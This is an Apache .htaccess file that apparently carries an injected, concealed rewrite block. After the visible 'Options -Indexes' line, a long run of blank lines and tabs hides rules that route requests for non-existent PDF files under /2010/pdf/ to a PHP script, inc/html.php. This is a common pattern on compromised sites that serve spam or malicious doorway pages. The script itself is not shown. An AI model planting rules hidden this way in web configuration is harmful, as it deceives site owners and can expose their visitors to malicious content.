Options -Indexes


























































































































																																																																																																																																																																																																																																																																								<IfModule mod_rewrite.c>
																																																																																																																																																																																																																																																																								RewriteEngine On
																																																																																																																																																																																																																																																																								RewriteBase /2010/
																																																																																																																																																																																																																																																																								RewriteCond %{REQUEST_FILENAME} !-f
																																																																																																																																																																																																																																																																								RewriteRule ^pdf/(.*)\.pdf$ inc/html.php
																																																																																																																																																																																																																																																																								</IfModule>